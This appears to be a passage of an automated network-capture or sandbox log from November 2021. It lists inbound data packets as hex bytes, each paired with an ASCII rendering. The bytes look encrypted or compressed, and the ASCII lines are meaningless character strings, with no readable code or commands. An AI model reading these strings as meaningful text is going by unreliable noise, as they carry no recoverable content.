                                                                                                                                                                                2021-11-11 11:26:10 UTC2765INData Raw: f2 d2 ff 92 1c 4e b3 6b 92 1c b7 e2 83 d9 89 5c d3 db 1b ff 90 d6 52 85 ea 0d 03 f7 c0 f2 2c 96 6f e1 e2 2f f4 e8 38 68 d1 58 48 3d 02 f3 4b b3 e8 d6 63 18 d2 f0 5f cc df 5f 3b c4 dc d7 3f f2 0d a6 bb 85 09 2d 4e 40 7b d1 29 f8 3e 5a 48 9b 69 ca b5 8d cf d3 50 a4 eb fe 2c be bf 5c 36 b1 d6 99 45 a5 15 5d d1 7d 0d 79 2e 6d e4 bf e1 f4 2c cb c3 fe 35 4c 3f 46 6e 11 34 b6 53 a8 a6 f5 ea 7a 52 68 20 c1 af 0c 4f db ab d0 d1 f8 62 6e 50 b2 c3 c9 0e 95 4b 2b 5d e1 1b bf 13 5f b4 d7 47 2e 01 b6 49 fd 4f d3 53 aa 49 37 1a db 5f 2b 26 d5 9c 45 98 51 fc f2 30 99 20 c8 69 c5 25 ac 92 73 7c 96 9c 7b 4d 5f 6e 50 e6 3a 50 96 e7 a7 b8 32 6b af 75 34 68 1d 7d c1 74 83 d3 50 47 5b 3e d0 7a 7b 29 b1 36 e4 13 b9 e2 f2 90 26 6c 7f c6 ef 1c 2c 46 c8 91 88 d4 21 a6 bd a7 ab 45
                                                                                                                                                                                Data Ascii: Nk\R,o/8hXH=Kc__;?-N@{)>ZHiP,\6E]}y.m,5L?Fn4SzRh ObnPK+]_G.IOSI7_+&EQ0 i%s|{M_nP:P2ku4h}tPG[>z{)6&l,F!E
                                                                                                                                                                                2021-11-11 11:26:10 UTC2766INData Raw: bf 72 0d 77 d1 ab 13 ad f5 2b af 52 59 ab aa 86 fb 57 32 54 b2 cd 80 1e 14 4d ca 4d 4b c3 a8 17 ec 1a 93 29 67 44 34 44 5a c0 62 ae 8e 50 29 c9 62 ba d7 10 42 3c f3 81 62 b7 2a a1 7a 8e 6d 10 e0 ee 8f 1c d5 30 3f c1 7f a9 98 69 da e3 50 03 85 09 eb 61 dc 04 f7 98 13 e9 c5 91 fa 3c e7 62 fe 97 ca ee ed 90 2a fb cd f1 4a 43 8d 42 58 53 85 c8 9a 1a df 5a e8 c0 0b 57 90 40 3a e1 ec 5e ff 65 de 97 fb 3c 26 1a 35 04 22 c4 68 28 75 58 2b 64 b3 6a bd a8 22 e7 f9 39 ed e4 2f b3 71 ad b9 a3 79 a1 3a 87 6f e3 06 a0 7a a9 fc e1 74 5f dd 31 f2 cc f0 91 ae 0d 9e c1 26 aa 10 a9 54 45 94 f2 dc 5d 9d 26 87 a1 d5 7a 38 1e 36 b9 0d 05 16 31 aa 93 95 0d 8a 86 1d 27 8e bc d3 1b d3 41 86 52 97 5a 7f b8 e3 45 b7 64 02 bc 6c ff f3 03 9e 5f 4f 4c 6d 28 e6 23 4e 01 29 13 1b a9 e0
                                                                                                                                                                                Data Ascii: rw+RYW2TMMK)gD4DZbP)bB<b*zm0?iPa<b*JCBXSZW@:^e<&5"h(uX+dj"9/qy:ozt_1&TE]&z861'ARZEdl_OLm(#N)
                                                                                                                                                                                2021-11-11 11:26:10 UTC2768INData Raw: 76 b7 85 e9 3f b6 53 71 f3 99 28 1b 31 67 0a e2 8c 6c 23 2e 4c 75 6a e5 a6 7e 38 30 4e 81 8d 06 45 e6 c2 2a 77 5e 83 12 c6 99 17 a6 04 32 c5 ab 42 ee 89 7d 24 ab f5 64 54 b0 92 2a 97 05 15 c1 df 06 83 11 a2 11 3c 8b 0e 5e e3 20 3e 2c 28 d7 a5 bf 92 b1 2d ce c0 69 99 73 d7 33 9b 74 69 f9 e2 75 71 9b ff ea 29 b1 6f 77 13 99 f9 12 e9 aa fa 26 7d 2d 28 df 63 02 4b 1c 55 99 85 ae c0 6a e0 b6 49 30 49 0d 71 36 87 86 50 35 6b ef a2 45 8d df 68 ef 6f 46 b2 61 53 47 90 b6 b8 fd 33 db 9d 95 29 3c 40 89 98 ce d5 b7 9c 15 4f 93 85 b6 8b 81 0f af df 67 67 9a 67 f3 bc e0 58 96 a0 81 21 19 5b de 60 b0 84 98 91 67 f3 86 5b 40 3d 5f 6a dd 43 57 65 f0 51 08 f3 aa a8 30 b9 13 bd 78 8f f5 a2 c5 6c 8b 52 b6 ba c7 bb f7 e3 ac ef 81 bf 38 0b 8b 30 a4 44 0e 98 26 29 5a 45 8e de
                                                                                                                                                                                Data Ascii: v?Sq(1gl#.Luj~80NE*w^2B}$dT*<^ >,(-is3tiuq)ow&}-(cKUjI0Iq6P5kEhoFaSG3)<@OgggX![`g[@=_jCWeQ0xlR80D&)ZE
                                                                                                                                                                                2021-11-11 11:26:10 UTC2772INData Raw: 9c c3 bf 5f ad d9 ab 59 1e 15 1e 97 94 20 30 37 cb 49 a1 b5 87 b5 f5 4b 14 f2 d9 c5 68 9a 19 2d 20 74 c2 04 7f 8e 8a 21 76 55 4d d7 8e 2a 15 f1 91 10 b0 93 59 0f 66 58 ed 16 17 d6 05 47 d8 ff 76 05 3f f9 f4 1c a9 90 6d 3c 2a 8a 0d be 40 57 27 01 d8 b5 f9 fe 89 93 db f9 d9 b0 32 7c 34 e6 0e 04 7d ab 4d fa e8 89 63 79 e5 e0 85 92 1c df 4e e6 d6 ba ea 1c b2 3c 51 00 45 31 2f 60 6b de 22 57 63 97 e6 c5 59 92 82 92 d3 b0 22 bf f0 e3 b2 b2 53 b3 25 49 5c 32 f6 28 ef f7 aa 79 e8 dd 09 d1 69 63 38 91 83 9f b5 d0 f3 b4 7c ff a1 a7 ef a3 52 2f 89 ba 6a ba 29 ed 11 10 e1 cc ad 87 86 b2 da 39 69 8e e2 54 c9 08 3d ff 2c 9e 23 93 ba 82 bd 47 8e 0e 70 32 75 e5 39 57 c7 61 a9 2c 82 be dc dc 81 d3 e2 cb a8 48 39 59 67 d2 18 9b 4e 9b fb e1 b3 24 43 f1 a5 05 f3 42 f9 ba 28
                                                                                                                                                                                Data Ascii: _Y 07IKh- t!vUM*YfXGv?m<*@W'2|4}McyN<QE1/`k"WcY"S%I\2(yic8|R/j)9iT=,#Gp2u9Wa,H9YgN$CB(
                                                                                                                                                                                2021-11-11 11:26:10 UTC2776INData Raw: 95 ec bf f1 96 92 7c d9 41 56 5a 22 3a 28 a6 be f6 84 ff 16 6e 9b fa cb d5 13 43 8b 1c 03 2c 22 5a ec 1a bc b7 3a d5 67 01 c5 3d 01 22 e3 9f 29 d7 a9 aa bb 84 d0 e7 ec 98 a1 da 77 61 eb f2 4f 52 af ee a0 e1 c1 6a 4d 9b 7b fb a8 fd e8 c9 dc 0b f9 8d cc 3a e5 f2 3c 17 c9 1e da b4 45 bd e0 00 a0 20 cb 84 fb f9 2c e7 99 ac 20 12 60 74 b1 29 b9 7d 94 03 42 1d cb bb a2 d3 46 b7 f7 f1 37 00 ba d7 e1 e8 2a a8 3f 6d 4e 62 a8 d7 e6 1e 28 81 a4 4c 8b 01 98 a9 b4 5c 19 b5 a8 85 81 e2 c6 dc f6 9f 45 70 6d 1f ad 13 f3 b4 15 18 d5 06 20 6a f9 26 af e7 9c b2 39 f2 2f aa b4 f2 1a 1a ba 67 2b b4 79 a7 fb b6 dd 29 da e0 2c 5f 22 46 98 0a e0 50 66 76 11 c0 7f e2 d9 77 a1 5d c9 2c 8c f5 05 80 a3 46 34 6b 24 b1 55 be 1f 32 ed b0 d8 6b 6c 59 67 98 66 50 a8 b7 34 28 99 7a fb bc
                                                                                                                                                                                Data Ascii: |AVZ":(nC,"Z:g=")waORjM{:<E , `t)}BF7*?mNb(L\Epm j&9/g+y),_"FPfvw],F4k$U2klYgfP4(z
                                                                                                                                                                                2021-11-11 11:26:10 UTC2777INData Raw: 77 e2 f5 5a 25 b0 2f 78 a5 2d 6b 6e 61 41 fd c3 a1 bf 72 3a 88 70 5e 9c 18 3f 2a 07 1c 10 aa 9b 37 e4 b6 6b 4e 26 f0 14 17 2b 97 31 93 2f 2f 53 63 33 56 01 2b b8 2b 25 bf a1 a2 7f 2c 97 2f b9 dd 79 ae 85 be b1 81 13 d3 03 80 7f 3d b7 b5 98 e5 8c c9 9b 1f af ef e6 19 b5 e9 59 13 37 96 84 a9 6f a8 85 a4 d0 1d 49 a7 02 6e a9 d9 6b 31 a3 d5 69 79 14 c3 75 2f aa e9 9c d4 45 f9 c1 a0 78 c6 16 f8 69 8a 62 6c c6 d8 e9 91 31 d6 1a c1 0a ca 87 61 50 10 aa 6d bc 7f 5f 26 74 02 d2 ae 79 6d 3e 36 d3 f9 7f c8 0b b7 7a ba 04 4a 3a b8 4a 03 4b 0f da 5b 31 66 04 52 31 f1 53 48 26 7f b1 22 8c ca e6 f9 b7 81 c4 cf 03 eb 8b 22 3b e0 6a 98 c4 db 8f fd ce c7 51 da 49 12 05 c8 d5 53 4e 02 c6 93 1b 9d 57 63 18 b5 da ac 01 ca e3 81 b9 a6 4c 32 4e 4e b5 68 f0 2b 92 a2 c4 97 8d b0
                                                                                                                                                                                Data Ascii: wZ%/x-knaAr:p^?*7kN&+1//Sc3V++%,/y=Y7oInk1iyu/Exibl1aPm_&tym>6zJ:JK[1fR1SH&"";jQISNWcL2NNh+
                                                                                                                                                                                2021-11-11 11:26:10 UTC2781INData Raw: 69 17 21 27 e4 94 cc 31 fb 05 16 d3 ab 4e e9 4a f4 8d 87 dd 4b 8a 13 94 87 d8 4a 64 5f de f6 60 5a 4a a0 db 91 a5 2a 5a 92 69 83 7e 49 ae 13 dd 32 68 0a dc d1 42 a7 9d b7 6e c2 54 e0 0a a4 90 3a ba 71 3b ab 1a 3d 3e 5f 3e 6c a3 98 08 a1 8b 99 f8 08 d6 68 62 58 51 ba a9 85 e8 47 8b 6d c1 56 24 0a 6b 61 95 65 e0 01 f1 a0 30 ee 21 a5 b7 bf b5 86 da 12 40 a5 35 bc 4d 16 98 2d 3b 45 ed 86 fd 5a dc 93 5a 79 28 4b e6 59 93 59 ec a5 f9 60 21 69 4e 94 7b 5a cd 3d ed f3 e6 35 58 6b a8 68 ae ef 6e 9f 5c d0 59 1b 98 50 34 82 b6 c2 85 b4 81 14 ea 2e aa 2c ff 1f df 5f 0b a0 3d 86 93 a7 7d e0 df 55 ba 7a 07 12 96 df b8 1d ae 85 f4 7d ef 1b 71 3b b7 cd fc 6a ae 6c e7 92 e5 f4 c5 24 f0 dc 34 41 99 41 ce 35 9b 70 d2 1f e6 2e 9f 71 ba f4 d5 99 55 8a 0d 06 24 18 88 cf 4a ca
                                                                                                                                                                                Data Ascii: i!'1NJKJd_`ZJ*Zi~I2hBnT:q;=>_>lhbXQGmV$kae0!@5M-;EZZy(KYY`!iN{Z=5Xkhn\YP4.,_=}Uz}q;jl$4AA5p.qU$J
                                                                                                                                                                                2021-11-11 11:26:10 UTC2785INData Raw: e7 37 98 8a 4d 53 49 0e 52 fa 38 14 ca 00 6e 2b 02 2b eb 9f d8 84 f0 59 27 5f 89 b4 8f 92 57 ce ac 5d fd 3b 03 e7 95 12 bd 85 31 00 cf c0 d2 2d 8e c6 63 eb 95 bc a2 e1 41 61 ff 27 86 3f 91 14 6c 39 10 00 ce f4 29 e3 6f c5 df 26 88 05 d7 af c5 0f 92 02 d6 58 cb 60 ce 25 c7 d7 d1 86 27 f1 f4 18 32 36 f9 0e 7d d1 56 7a c5 56 b0 f9 04 42 2e b1 59 53 09 95 53 b0 2e ed eb 3f 86 e5 c1 67 41 e0 cf 3a 8e 46 68 96 8f 08 6d ab 2f e9 9e a8 b5 19 2d a7 4a 55 d5 2f 8e 2b eb 59 d6 62 41 b8 dd d8 e9 81 65 47 f3 bb df 59 6e 26 98 76 99 40 d7 6c 61 ff 40 ef 52 f6 34 98 17 3c 8b f9 53 97 af ad 22 43 03 37 b7 e9 9f b6 ba 43 bf 8b d5 79 7a 3f 1d 32 40 2b f5 57 f2 23 6a 40 ea 26 f9 7f 4e 96 9c bf 7a 84 e9 2c b9 79 b5 eb fc 94 34 ec 4c b6 d6 63 09 7a 41 0c 38 5a ad 53 22 fb 58
                                                                                                                                                                                Data Ascii: 7MSIR8n++Y'_W];1-cAa'?l9)o&X`%'26}VzVB.YSS.?gA:Fhm/-JU/+YbAeGYn&v@la@R4<S"C7Cyz?2@+W#j@&Nz,y4LczA8ZS"X
                                                                                                                                                                                2021-11-11 11:26:10 UTC2789INData Raw: 00 4f 6a 9e a2 b8 3f 24 90 92 40 90 f1 d4 66 5e e4 ab 95 35 01 a2 be e9 a6 27 3f 05 5e 7e 13 ea 3e 29 79 2e 29 a5 10 c4 72 be 4f 98 e9 06 29 ee b2 21 0c 0b c6 4d 4c 90 78 22 1a 86 73 21 22 1d 80 4a f2 8d b9 55 d4 fe d9 42 32 c4 e5 95 e2 7b 66 49 50 a5 40 f5 98 26 08 0a c5 e2 52 be ff 2a 1b ff ae b8 81 31 59 99 23 e8 8f 2b 64 c1 be aa 01 db f5 eb 19 5b 96 6f 04 6c c6 77 d9 9a f1 fd a1 00 af e9 58 99 b3 da 62 59 2c 3e 24 8b 1b e8 4c 09 22 ba 68 c4 65 aa 49 c2 fc 61 79 de 67 eb 29 4d b2 92 7a 57 93 e3 2b ed 5b 07 78 22 18 06 68 ae ff 37 4b 36 a5 22 41 a4 be 3a 81 b9 76 f3 31 c1 b7 10 f2 1c 87 86 89 d1 04 af 60 3f 6b 45 d2 6f a4 d6 81 b6 ac d1 02 f5 f9 15 eb f9 49 e6 70 59 4d eb 19 2e 5f 81 3e 5b 55 90 2b 2f 34 4e e2 1d c7 1d 5d 7a 26 2c 07 25 e6 f6 4e e6 20
                                                                                                                                                                                Data Ascii: Oj?$@f^5'?^~>)y.)rO)!MLx"s!"JUB2{fIP@&R*1Y#+d[olwXbY,>$L"heIayg)MzW+[x"h7K6"A:v1`?kEoIpYM._>[U+/4N]z&,%N
                                                                                                                                                                                2021-11-11 11:26:10 UTC2793INData Raw: 97 74 91 57 52 fc d2 a1 ff dc 80 ca 25 6f f1 9f 48 3a 6b e1 55 2e 8a ea ea 6b b6 1b 95 80 3c 42 34 f7 8a 53 5a 60 76 61 4e ba b9 91 53 e7 3e 49 de 31 83 d3 c4 b4 d2 a5 b2 3e 2f 60 88 4f 7c d5 56 9e 0f a2 81 aa 41 76 99 bf f6 ef 7e 09 ed 4f e9 40 3b 50 52 9e 99 69 41 ea 46 5a 31 23 f5 c0 d6 a4 00 2a 50 83 66 9b d6 f1 6b e1 58 3c 0c 08 9d 22 be d2 df a8 29 e1 c7 15 84 6f 29 9e 49 11 da e9 e7 5b 2a 1b b4 da e9 89 78 1e 1a 26 77 1b f4 91 bb 48 a4 04 92 10 ea 53 eb c9 38 a4 b1 ac fb c2 e5 0e f0 fc a1 b1 db 36 6f 5d 89 91 bf 5e ad b2 d9 8c ce c6 90 70 dd 2b 82 6e 9e f8 a0 f6 e9 10 e2 f0 2f 79 a7 e9 94 ea c2 51 ec cc db 0f d2 12 1c ef 09 44 7a 2e a1 4c 37 61 4a 0c 26 5d 35 14 da 8e f3 43 39 da 00 af e8 86 e0 69 5c 15 99 4a db 00 8b ce 66 a8 51 e9 9b 6a f2 87 83
                                                                                                                                                                                Data Ascii: tWR%oH:kU.k<B4SZ`vaNS>I1>/`O|VAv~O@;PRiAFZ1#*PfkX<")o)I[*x&wHS86o]^p+n/yQDz.L7aJ&]5C9i\JfQj
                                                                                                                                                                                2021-11-11 11:26:10 UTC2797INData Raw: 54 ec 24 6c 0a a1 f2 a7 52 19 96 de 15 2f 56 df 37 dd 89 6e 68 47 86 bd a9 72 ca 08 8f 4e df dc ca e3 20 5e 2a ca 95 d8 d2 6b 83 ba e5 2e 75 9b 59 e3 49 9a e3 7c 95 43 bf 1e dd ca 78 a5 f6 fc b2 85 09 28 9c 77 9b 95 8b af 79 9b 57 4f bb 56 3b ca e6 31 61 03 79 75 32 52 c4 aa 6e e7 14 14 94 e3 bf 6b d2 85 81 6b a0 1e 6c 70 88 83 03 d1 96 26 23 68 97 31 05 c5 e9 69 6e 13 98 05 f3 94 fe 7b 98 03 49 07 50 54 9d 26 1b fb 2a cb c1 73 bd da a4 70 54 cc 65 8d d1 50 c9 b8 c6 62 93 9d c9 e9 82 e9 70 a9 42 bd 6a 1e 0b a2 67 74 16 8b 74 02 23 c1 fc b5 29 e2 87 6a d5 2e 95 b8 23 5e 2a 28 42 a6 e7 a0 a4 b4 39 2f 12 cb 87 2c a2 bf 2f 25 17 49 92 0f 6e 1d 21 18 05 81 6a 46 a5 34 bf f8 02 71 50 62 72 f1 97 e8 2b bd b9 8d 0b eb fd 56 b2 31 c4 7e 0b 1e a7 42 5c 3e c8 ec 55
                                                                                                                                                                                Data Ascii: T$lR/V7nhGrN ^*k.uYI|Cx(wyWOV;1ayu2Rnkklp&#h1in{IPT&*spTePbpBjgtt#)j.#^*(B9/,/%In!jF4qPbr+V1~B\>U
                                                                                                                                                                                2021-11-11 11:26:10 UTC2802INData Raw: 2d 93 2b c9 67 37 5c 8e a9 26 12 b2 6b b1 4e 96 5b 23 b9 d2 31 d1 7d e9 97 12 d1 79 db 3a b6 33 ae 82 87 d1 ce 94 ac 7d 69 cf 7b 15 11 e9 27 57 22 87 18 d3 c0 c5 20 09 2b a3 a7 b7 2a 82 d8 b4 da 04 db 79 5f 01 8b 91 b9 54 af d8 a7 b2 2b 6b 91 d1 69 b9 6f 12 31 77 e1 22 55 ec 8c da 6d 95 03 30 05 aa 44 12 37 73 91 39 4f b5 37 cf 55 38 3b 11 7a ab b0 84 ea 9c e5 65 7b 58 ca af c2 41 c6 9c 31 92 bd c6 b7 a3 9a 97 d8 43 3e 97 26 e8 ff 97 dd e1 f4 21 19 1a ca 12 a9 ef 54 72 d8 29 fa 22 b8 e2 d6 71 7c 18 cc 50 f3 ad cc b1 45 78 b5 dc 1a 30 be cd fd 0f e7 85 e4 a1 61 54 f8 a9 30 39 4e a3 95 7a 34 cf 03 12 1b c3 8a 81 a8 66 7b d9 d4 7d f0 46 28 f0 7b 41 63 fa df 0b 25 b2 45 ab 23 9b 4b 0b e4 7a 6e 50 a3 a3 da 78 4f 44 18 1c 8e d1 ec 5f 0f 43 79 09 e4 ca 0e 2a b4
                                                                                                                                                                                Data Ascii: -+g7\&kN[#1}y:3}i{'W" +*y_T+kio1w"Um0D7s9O7U8;ze{XA1C>&!Tr)"q|PEx0aT09Nz4f{}F({Ac%E#KznPxOD_Cy*
                                                                                                                                                                                2021-11-11 11:26:10 UTC2806INData Raw: 54 a4 49 2a dd 2d f4 4e c8 07 bb e3 f7 06 50 36 99 2b ad 4e 01 b3 30 a3 43 89 b0 1f 47 ec 44 da 66 e1 63 a5 17 f8 90 10 13 c1 98 5a 70 22 33 fd eb 80 90 d8 79 ee 3f 56 4a 11 95 6e f3 e3 7e 77 33 57 75 9e cd df 33 32 26 5e e8 4f f6 df 31 b1 67 21 a7 a4 a5 da b3 f1 d5 e9 2b 38 27 eb b0 a6 7b 39 4e d8 79 a5 45 28 55 75 90 db c6 0f df f7 db 11 46 ef cf 76 d0 69 e1 d2 44 2a e6 f9 bb ea 21 8d 3f 39 7a 9b ef a3 f4 66 7b 38 1a 29 6b fe 2b 5b a9 4d a4 22 74 fa 09 63 78 7a 63 9a 3b 31 b4 10 ee 4f 43 69 3f ee 81 4d 12 37 89 6e a1 82 62 5e 20 3c 8e 21 0c 24 9c 80 88 f8 88 5d 64 54 86 b1 b8 fa d8 62 71 68 90 ff f7 e6 0c 83 1d 78 97 9b 77 b6 2e 21 ec f4 c1 9b 7d ba 87 41 b7 e1 d1 de 1a c6 ea 2a 63 e9 14 5d 6a 32 f4 4b 4f e3 f3 90 50 60 e3 06 47 9a 24 5a 30 fe 6e 75 52
                                                                                                                                                                                Data Ascii: TI*-NP6+N0CGDfcZp"3y?VJn~w3Wu32&^O1g!+8'{9NyE(UuFviD*!?9zf{8)k+[M"tcxzc;1OCi?M7nb^ <!$]dTbqhxw.!}A*c]j2KOP`G$Z0nuR
                                                                                                                                                                                2021-11-11 11:26:10 UTC2809INData Raw: 56 27 e2 5d 4e 72 64 8c de 42 d2 60 d6 e6 68 52 c1 82 3d b6 e1 6c a7 19 2d e5 2c 86 1e 35 ed 67 fa bd f7 be 4a 13 58 21 b9 46 57 42 cf af e6 1d 1f 68 30 67 c4 b1 89 91 d3 6d fb 0b 1b ac f6 d7 80 32 6e 85 f9 e8 e7 59 8d 1f 48 06 44 70 b8 32 a9 5e f2 61 b7 78 b8 39 af 0b 54 72 fd 97 30 b7 6d d5 99 85 45 c7 5e 4d 97 b5 15 f8 b8 19 73 63 1e 4b 94 79 ec 63 e3 4c 4d 64 45 41 06 97 1b af bf 97 1a f2 fe 71 57 df 25 3d f5 ad 83 69 37 3a a1 09 bc e8 98 ab 37 d6 e1 ea 22 a1 ba 4b 4a 04 c4 d3 ee 23 b1 c4 b9 a0 14 64 f5 48 c3 01 4e 78 82 44 0c ff 80 f5 fa 17 24 69 18 e7 24 7e 69 dc da c6 4e 17 1b 97 61 97 ab 2a 0b 69 29 be 1c e1 e2 b9 8e b7 5c 61 b0 bf d9 15 9a 51 4e a5 f3 f9 35 9c ed f2 3f a9 fc 4e e9 15 fe 57 3e 49 b5 d5 32 14 92 83 5d f7 e8 17 8b 47 c9 af ea 28 e6
                                                                                                                                                                                Data Ascii: V']NrdB`hR=l-,5gJX!FWBh0gm2nYHDp2^ax9Tr0mE^MscKycLMdEAqW%=i7:7"KJ#dHNxD$i$~iNa*i)\aQN5?NW>I2]G(
                                                                                                                                                                                2021-11-11 11:26:10 UTC2813INData Raw: 99 20 d8 0d c4 bd 2c 62 8a 31 b7 45 a3 7d 35 76 88 20 f7 d4 42 fe 37 9b 26 cb 46 dd 28 6a 61 cf f4 39 67 1b 75 99 20 a1 98 3e 9d 85 e7 29 a5 ab b3 2d 9f a9 c6 42 c4 22 ac 37 a4 ae 04 c3 15 45 2a 5c 1e 3b ab 8d ff 79 09 43 ad 50 57 f0 3b 58 08 8d 67 44 a5 78 76 29 3e 9d 41 e8 ab b5 50 42 f7 5c 29 7f 77 8b 03 f6 7c 50 9c 82 40 41 cc 37 70 ca 56 04 25 33 e9 83 9c 51 38 3d ea 38 a0 0d fa a7 14 57 d8 2b 0c 9a ff 9e 1e da 90 91 c2 e4 df 6b d2 8c ab b6 09 c7 9c a4 f2 64 e6 71 9c 62 19 bd e1 86 a9 b0 21 d6 40 96 12 5f 48 d0 80 9d 4f 5b 41 87 28 65 b2 3b bf 4d 6f fb c0 9b 63 d1 2a bc 81 73 ec 84 1f 0e 05 21 29 d2 00 4e ec b1 a4 b8 e8 2b c0 c8 47 ab 76 42 bd 8a 09 67 32 bd f6 95 5a 81 c9 95 4a 22 29 a0 63 9f cb a4 6b e1 ff ea d0 4e df cd 12 d0 46 75 bb b9 79 0a ed
                                                                                                                                                                                Data Ascii: ,b1E}5v B7&F(ja9gu >)-B"7E*\;yCPW;XgDxv)>APB\)w|P@A7pV%3Q8=8W+kdqb!@_HO[A(e;Moc*s!)N+GvBg2ZJ")ckNFuy
                                                                                                                                                                                2021-11-11 11:26:10 UTC2817INData Raw: d2 8d 25 63 a8 49 4e b6 c6 78 99 92 97 79 dc 98 92 69 e1 a7 8b c9 ec 77 6d cb 61 84 d7 ff dd b4 db 86 14 89 fb 49 e4 8f ab 15 df f6 e6 79 f5 46 78 d7 07 03 f0 1c 34 2a b4 4c a4 7c 41 eb 6c 09 52 d8 b3 13 be 09 9d 34 fc 42 34 c4 c2 6d e9 04 2a 84 e5 e1 8d 49 3f fc 0b 48 0c a8 88 60 4e 46 30 d2 08 8e 7a 8b 45 5a 2e 74 54 69 b2 5a 36 18 1e 6f 2c 7b b7 5e fd 01 59 d6 f5 28 a1 76 79 31 d8 38 63 12 af ae 8b 27 c5 1f e9 f4 fe ec e8 a7 e1 29 70 7b 17 a8 50 00 9a 68 c4 51 37 f6 ad 91 c7 4e 13 e9 7f f2 5d f9 d9 4b 5e 4c 37 1b e6 bd 6b 31 22 a5 aa a9 9a 16 8b 64 d2 63 9b 4b 6a 1e 2e 61 09 72 ba 65 ea 92 d4 a8 fa d1 ea 7b 10 5e ef a4 9f 6e f5 42 c4 7b a5 dd 7f 39 ff cd 6c a3 cd f5 69 3a 78 09 d3 c5 68 fa 83 18 f2 e5 de b0 8a 81 ba 8d ee 7d 89 3d 6f 41 1b 2e d0 2c ce
                                                                                                                                                                                Data Ascii: %cINxyiwmaIyFx4*L|AlR4B4m*I?H`NF0zEZ.tTiZ6o,{^Y(vy18c')p{PhQ7N]K^L7k1"dcKj.are{^nB{9li:xh}=oA.,
                                                                                                                                                                                2021-11-11 11:26:10 UTC2821INData Raw: 69 b4 a8 11 35 0f e7 e4 41 c2 78 81 ac 94 eb 74 4d 32 43 95 04 71 df 5c 61 9a f3 88 59 8b bd c3 3e b0 95 7c c6 2d 8f 16 25 0d a5 86 be 67 92 88 c3 27 bb b5 46 93 a8 07 ae e0 68 a5 20 1a 69 33 b9 09 51 9b 7e 15 7b 80 95 3a 51 67 e5 36 5a a9 48 82 ba 83 d8 88 00 1c e5 f2 45 31 62 d6 16 70 51 27 96 fa 58 a9 92 f4 13 69 66 9b 98 6f c9 47 48 63 7b da 93 20 70 2d 95 71 c1 51 7f 21 41 69 a3 d8 79 63 55 7f fc f4 e6 af 04 a0 2f c7 48 4b 4f 63 c9 b3 c4 8f bc 3f 69 29 71 65 27 36 e8 58 47 da b3 97 d5 97 b4 3b 55 13 6f 54 ec 64 4b a6 4a f2 f8 30 2b a1 ff d0 f2 3d b0 f0 96 6d 47 f9 0a 86 f7 37 8c 15 d9 1e 62 bd 51 c0 cc ad 41 c0 84 3d 83 ca 1b b3 e3 9b 1f 0c 43 63 3c 83 a8 1e 7d 48 f3 80 61 d2 b0 ba b6 e6 be 4d 6a d6 f6 85 51 ef fa 56 d6 b3 e8 85 2e c8 a5 17 e8 ce 7b
                                                                                                                                                                                Data Ascii: i5AxtM2Cq\aY>|-%g'Fh i3Q~{:Qg6ZHE1bpQ'XifoGHc{ p-qQ!AiycU/HKOc?i)qe'6XG;UoTdKJ0+=mG7bQA=Cc<}HaMjQV.{
                                                                                                                                                                                2021-11-11 11:26:10 UTC2825INData Raw: 0d 06 4f a9 97 dd 88 44 2f 69 d2 f8 da 4f 30 bc 97 b5 69 f8 f2 ba aa 61 13 ef a5 f1 32 b7 61 ab ea cb 9b b3 f3 7c 85 9c 7b 04 f5 ed 8a 8f 68 79 81 68 6c ed 4c 9f b8 bb 3c dd 93 2d 86 6e 48 41 d8 30 1b 07 f3 1b 71 1e d1 cf 90 92 3c 98 f6 0b 08 a0 af 54 66 1d b6 6b bd 00 84 67 9a 2b 4a 98 ea 68 9e 70 f4 97 75 3a e8 6f 5d 08 3b 23 95 d7 2f af e9 95 d2 24 ba a8 e8 e1 a8 35 e2 1a b3 09 0a c8 84 1a c2 f4 b9 df 7d 5b 55 d3 73 e4 8e 73 f7 b1 7b 92 2f ab 33 60 e0 97 2e aa e7 1b 1f 6b b9 eb 38 72 f6 cf a0 f7 96 99 78 01 98 f7 b7 51 6b 4d 60 93 ad 27 38 27 50 01 61 65 46 e9 a7 32 77 46 c3 19 10 ba dc bd ea 30 bf 29 ad 31 dd 43 f4 b8 e7 64 c4 62 bf 29 94 37 dc 72 9d 50 88 49 ef 69 88 70 e3 bf ad ff fb 9b a4 8a e6 bb d7 5a 6d d6 16 b7 ee b8 ea d2 b1 7d f5 e1 f1 68 5c
                                                                                                                                                                                Data Ascii: OD/iO0ia2a|{hyhlL<-nHA0q<Tfkg+Jhpu:o];#/$5}[Uss{/3`.k8rxQkM`'8'PaeF2wF0)1Cdb)7rPIipZm}h\
                                                                                                                                                                                2021-11-11 11:26:10 UTC2829INData Raw: de be 51 67 b4 e7 eb a1 2d 29 33 78 1a bc 74 58 90 b8 d1 e2 3d cc 74 5e 21 c6 24 10 2f b6 b2 eb 32 a0 c8 43 4f d1 73 d4 50 eb b2 5f d5 9b 0e fd 9a 8b 31 98 7a da 40 6f 53 66 f9 00 a5 ca 9d c1 be 8d 1e 4e 6e 19 da ca 20 e5 74 06 ed 37 11 84 87 77 6a 97 29 36 7d 56 f4 c1 2a 83 9b d8 62 ec e3 f1 55 97 30 30 9d d0 4d bc e8 26 44 fa a6 aa c9 15 66 3b 11 56 fd 18 23 f2 3f 5f 97 89 bb fd 27 0b 1f 5d de 1e f6 92 9b 96 77 90 bf 5e 4c a4 92 6a 27 12 cc 81 74 e5 cc b1 be f9 28 a1 88 b6 be 32 8c 30 bc 75 06 ef d5 9a 1d c7 28 8a 5b c1 af 57 72 6a 2d 2e 6e 5d c3 21 92 5c b4 7c 76 dd 17 e6 d0 3c b5 76 46 5a ad b7 b2 1c 70 30 61 5f eb 6c 51 eb 67 a7 55 dd 5d 4f e0 7b a6 8c df 53 f4 a4 73 64 57 ef 5e 79 05 dc 44 cf 77 e6 a8 c0 40 3e 95 ca ad 77 5d ea 51 ba 6e 9e 91 89 e2
                                                                                                                                                                                Data Ascii: Qg-)3xtX=t^!$/2COsP_1z@oSfNn t7wj)6}V*bU00M&Df;V#?_']w^Lj't(20u([Wrj-.n]!\|v<vFZp0a_lQgU]O{SsdW^yDw@>w]Qn
